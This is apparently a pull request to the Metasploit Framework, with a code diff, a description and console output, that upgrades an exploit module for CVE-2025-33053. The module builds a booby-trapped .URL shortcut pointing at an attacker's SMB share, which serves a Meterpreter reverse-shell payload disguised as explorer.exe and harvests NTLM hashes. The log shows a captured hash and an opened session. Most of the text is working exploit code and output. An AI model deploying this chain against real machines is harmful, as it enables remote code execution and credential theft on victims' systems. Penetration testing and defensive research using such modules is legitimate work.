### PR TITLE
Internet Shortcut UNC Module Upgrade

### DIFF
--- a/modules/exploits/windows/fileformat/cve_2025_33053.rb
+++ b/modules/exploits/windows/fileformat/cve_2025_33053.rb
@@ -1,8 +1,13 @@
-# frozen_string_literal: true
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
 
-# Metasploit module to exploit CVE-2025-33053 via malicious .URL and WebDAV payload hosting.
 class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::FILEFORMAT
 
   def initialize(info = {})
     super(
@@ -17,7 +22,11 @@ class MetasploitModule < Msf::Exploit::Remote
           potentially resulting in remote code execution via a trusted binary.
         },
 
-        'Author' => ['Dev Bui Hieu'],
+        'Author' => [
+          'Alexandra Gofman', # vuln research
+          'David Driker', # vuln research
+          'Dev Bui Hieu' # module dev
+        ],
         'License' => MSF_LICENSE,
         'DisclosureDate' => '2025-06-11',
         'References' => [
@@ -38,12 +47,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
+        OptString.new('URIPATH', [true, 'The URI to use (do not change)', '/']),
         OptString.new('OUTFILE', [true, 'Output URL file name', 'bait.url']),
         OptString.new('PAYLOAD_NAME', [true, 'Output payload file name', 'route.exe']),
         OptString.new('PAYLOAD', [true, 'Payload to generate', 'windows/x64/meterpreter/reverse_tcp']),
         OptBool.new('GEN_PAYLOAD', [true, 'Generate payload and move to WebDAV directory', true]),
         OptString.new('WEBDAV_DIR', [true, 'WebDAV directory path', '/var/www/webdav'])
-      ]
+      ], self.class
     )
     register_advanced_options(
       [
@@ -57,64 +67,51 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def exploit
-    prepare_webdav_dir
-    generate_payload_if_needed
-    write_url_file
-    print_status("Module complete. Deliver #{File.expand_path(datastore['OUTFILE'])} to victim.")
-  end
-
-  def prepare_webdav_dir
-    print_status('Creating WebDAV directory if not exists...')
-    FileUtils.mkdir_p(datastore['WEBDAV_DIR']) unless File.directory?(datastore['WEBDAV_DIR'])
-  rescue Errno::EACCES
-    fail_with(Failure::NoAccess,
-              "Cannot create WebDAV directory. Permission denied.\n" \
-              "Try restarting Metasploit with sudo or change ownership of #{datastore['WEBDAV_DIR']}.")
-  end
-
-  def generate_payload_if_needed
-    return unless datastore['GEN_PAYLOAD']
-
-    exe_path = File.join(datastore['WEBDAV_DIR'], datastore['PAYLOAD_NAME'])
-    print_status('Generating payload...')
-    generate_payload_exe(datastore['PAYLOAD'], datastore['LHOST'], datastore['LPORT'], exe_path)
-  end
-
-  def generate_payload_exe(payload_name, lhost, lport, output_path)
-    payload = framework.payloads.create(payload_name.to_s.strip)
-    payload.datastore['LHOST'] = lhost
-    payload.datastore['LPORT'] = lport
-    raw = payload.generate
-    exe = Msf::Util::EXE.to_win32pe(framework, raw)
-    write_exe_file(output_path, exe)
-  end
-
-  def write_exe_file(path, exe)
-    File.open(path, 'wb') { |f| f.write(exe) }
-    print_good("Payload successfully written to #{path}")
-  rescue Errno::EACCES
-    return_error(path)
-  end
-
-  def write_url_file
-    content = generate_url_content
-    outfile = datastore['OUTFILE']
-    begin
-      print_status('Generating .URL file...')
-      File.write(outfile, content)
-      print_good(".URL file written to: #{outfile}")
-    rescue Errno::EACCES
-      return_error(File.expand_path(outfile))
+  def on_request_uri(cli, request)
+    print_status('Got request')
+    case request.method
+    when 'OPTIONS'
+      print_status('[+] Got OPTIONS request')
+      process_options(cli, request)
+    when 'PROPFIND'
+      print_status('[+] Got PROPFIND request')
+      process_propfind(cli, request)
+    when 'GET'
+      print_status('[+] Got GET request')
+      process_get(cli, request)
+    else
+      process_ignore(cli, request)
     end
   end
 
-  def generate_url_content
-    unc_path = "\\\\#{datastore['LHOST']}\\#{File.basename(datastore['WEBDAV_DIR'])}\\"
+  def primer
+    webdav = '\\\\'
+    if datastore['SSL']
+      if datastore['SRVPORT'] != 443
+        fail_with(Failure::BadConfig, 'SRVPORT must be 443')
+      end
+      webdav = "#{datastore['SRVHOST']}@ssl"
+    else
+      webdav = "#{datastore['SRVHOST']}@#{datastore['SRVPORT']}"
+    end
+    webdav_unc = %(#{webdav}\\webdav\\)
+    print_status("[+] WebDAV running at #{webdav_unc}")
+    write_url_file(webdav_unc)
+  end
+
+  def write_url_file(webdav_unc)
+    content = generate_url_content(webdav_unc)
+    outfile = %(#{Rex::Text.rand_text_alphanumeric(8)}.url)
+    path = store_local('webdav.url', nil, content, outfile)
+    print_status("[+] URL file: #{path}, deliver to target's machine")
+    print_status("[+] Run following: curl http://#{datastore['SRVHOST']}:8080/#{outfile} -o #{outfile}")
+  end
+
+  def generate_url_content(webdav_unc)
     <<~URLFILE
       [InternetShortcut]
       URL=#{datastore['LOLBAS_EXE']}
-      WorkingDirectory=#{unc_path}
+      WorkingDirectory=#{webdav_unc}
       ShowCommand=7
       IconIndex=#{datastore['ICON_INDEX']}
       IconFile=#{datastore['ICON_PATH']}

--- a/modules/exploits/windows/fileformat/cve_2025_33053.rb
+++ b/modules/exploits/windows/fileformat/cve_2025_33053.rb
@@ -86,8 +86,6 @@ class MetasploitModule < Msf::Exploit::Remote
     outfile = %(#{Rex::Text.rand_text_alphanumeric(8)}.url)
     path = store_local('webdav.url', nil, content, outfile)
     print_status("URL file: #{path}, deliver to target's machine and wait for shell")
-    # debug stuff
-    # print_status("Run following: curl http://#{datastore['LHOST']}:8080/#{outfile} -o #{outfile}")
   end
 
   def generate_url_content

--- a/modules/exploits/windows/fileformat/cve_2025_33053.rb
+++ b/modules/exploits/windows/fileformat/cve_2025_33053.rb
@@ -6,8 +6,10 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::Remote::SMB::Server::HashCapture
   include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
 
   def initialize(info = {})
     super(
@@ -34,12 +36,19 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept']
         ],
         'Platform' => 'win',
-        'Arch' => ARCH_X64,
+        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Passive' => true,
         'Targets' => [['Windows (generic)', {}]],
+        'DefaultOptions' => {
+          'FOLDER_NAME' => 'webdav',
+          'FILE_NAME' => 'explorer.exe',
+          'DisablePayloadHandler' => false,
+          'Payload' => 'windows/x64/meterpreter/reverse_tcp'
+        },
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'SideEffects' => [ARTIFACTS_ON_DISK],
+          'SideEffects' => [IOC_IN_LOGS],
           'Reliability' => [REPEATABLE_SESSION]
         }
       )
@@ -47,81 +56,49 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('URIPATH', [true, 'The URI to use (do not change)', '/']),
-        OptString.new('OUTFILE', [true, 'Output URL file name', 'bait.url']),
-        OptString.new('PAYLOAD_NAME', [true, 'Output payload file name', 'route.exe']),
-        OptString.new('PAYLOAD', [true, 'Payload to generate', 'windows/x64/meterpreter/reverse_tcp']),
-        OptBool.new('GEN_PAYLOAD', [true, 'Generate payload and move to WebDAV directory', true]),
-        OptString.new('WEBDAV_DIR', [true, 'WebDAV directory path', '/var/www/webdav'])
+        OptString.new('OUTFILE', [false, 'Output URL file name', '']),
       ], self.class
     )
-    register_advanced_options(
-      [
-        OptString.new('LOLBAS_EXE',
-                      [true, 'Path to trusted binary (LOLBAS)', 'C:\\Program Files\\Internet Explorer\\iediagcmd.exe']),
-        OptString.new('ICON_PATH',
-                      [true, 'Icon file path', 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe']),
-        OptInt.new('ICON_INDEX', [true, 'Icon index in icon file', 13]),
-        OptString.new('MODIFIED_HEX', [true, 'Modified timestamp in hex', '20F06BA06D07BD014D'])
-      ]
-    )
   end
 
-  def on_request_uri(cli, request)
-    print_status('Got request')
-    case request.method
-    when 'OPTIONS'
-      print_status('[+] Got OPTIONS request')
-      process_options(cli, request)
-    when 'PROPFIND'
-      print_status('[+] Got PROPFIND request')
-      process_propfind(cli, request)
-    when 'GET'
-      print_status('[+] Got GET request')
-      process_get(cli, request)
-    else
-      process_ignore(cli, request)
+  def exploit_remote_load
+    start_service
+    print_status('The SMB service has been started.')
+
+    self.file_contents = generate_payload_exe
+  end
+
+  def exploit
+    write_url_file
+    exploit_remote_load
+
+    stime = Time.now.to_f
+    timeout = datastore['ListenerTimeout'].to_i
+    loop do
+      break if timeout > 0 && (stime + timeout < Time.now.to_f)
+
+      Rex::ThreadSafe.sleep(1)
     end
   end
 
-  def primer
-    webdav = '\\\\'
-    if datastore['SSL']
-      if datastore['SRVPORT'] != 443
-        fail_with(Failure::BadConfig, 'SRVPORT must be 443')
-      end
-      webdav = "#{datastore['SRVHOST']}@ssl"
-    else
-      webdav = "#{datastore['SRVHOST']}@#{datastore['SRVPORT']}"
-    end
-    webdav_unc = %(#{webdav}\\webdav\\)
-    print_status("[+] WebDAV running at #{webdav_unc}")
-    write_url_file(webdav_unc)
-  end
-
-  def write_url_file(webdav_unc)
-    content = generate_url_content(webdav_unc)
+  def write_url_file
+    content = generate_url_content
     outfile = %(#{Rex::Text.rand_text_alphanumeric(8)}.url)
     path = store_local('webdav.url', nil, content, outfile)
-    print_status("[+] URL file: #{path}, deliver to target's machine")
-    print_status("[+] Run following: curl http://#{datastore['SRVHOST']}:8080/#{outfile} -o #{outfile}")
+    print_status("URL file: #{path}, deliver to target's machine and wait for shell")
+    # debug stuff
+    # print_status("Run following: curl http://#{datastore['LHOST']}:8080/#{outfile} -o #{outfile}")
   end
 
-  def generate_url_content(webdav_unc)
+  def generate_url_content
     <<~URLFILE
       [InternetShortcut]
-      URL=#{datastore['LOLBAS_EXE']}
-      WorkingDirectory=#{webdav_unc}
+      URL=C:\\Windows\\System32\\CustomShellHost.exe
+      WorkingDirectory=\\\\#{srvhost}\\#{share}\\#{folder_name}\\
       ShowCommand=7
-      IconIndex=#{datastore['ICON_INDEX']}
-      IconFile=#{datastore['ICON_PATH']}
-      Modified=#{datastore['MODIFIED_HEX']}
+      IconIndex=13
+      IconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
+      Modified=20F06BA06D07BD014D
     URLFILE
-  end
-
-  def return_error(currentpath)
-    fail_with(Failure::NoAccess,
-              "Cannot write to #{currentpath}. Permission denied.\n" \
-              'Try restarting Metasploit with root privilege.')
   end
 end


### PR DESCRIPTION
This PR upgrades the submitted module for CVE-2025-33053. The PR adds support for SMB server, which will host a Metasploit payload as benign file - such as `explorer.exe`. The module will drop into local storage `.url` file, which contains hosted SMB share as `WorkingDirectory`. If a victim clicks on `.url` file, target machine will reach out to malicious SMB share and download `explorer.exe`, assuming it's legit Windows binary, and execute it. The module will also receive `NTLM` hash in the process.

```
msf6 exploit(windows/fileformat/cve_2025_33053) > [*] URL file: /home/ms/.msf4/local/B1JK3E4L.url, deliver to target's machine
[*] Run following: curl http://192.168.3.7:8080/B1JK3E4L.url -o B1JK3E4L.url
[*] Server is running. Listening on 192.168.3.7:4445
[*] The SMB service has been started.
[*] Received SMB connection from 10.5.132.137
[SMB] NTLMv2-SSP Client     : 10.5.132.137
[SMB] NTLMv2-SSP Username   : WIN10_22H2_7FD2\msfuser
[SMB] NTLMv2-SSP Hash       : msfuser::WIN10_22H2_7FD2:[yolo]

[*] Sending stage (203846 bytes) to 10.5.132.137
[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.132.137:49817) at 2025-06-24 12:06:02 +0200

msf6 exploit(windows/fileformat/cve_2025_33053) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                           Connection
  --  ----  ----                     -----------                           ----------
  1         meterpreter x64/windows  WIN10_22H2_7FD2\msfuser @ WIN10_22H2  192.168.3.7:4444 -> 10.5.132.137:4981
                                     _7FD2                                 7 (10.5.132.137)

msf6 exploit(windows/fileformat/cve_2025_33053) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer        : WIN10_22H2_7FD2
OS              : Windows 10 22H2+ (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
```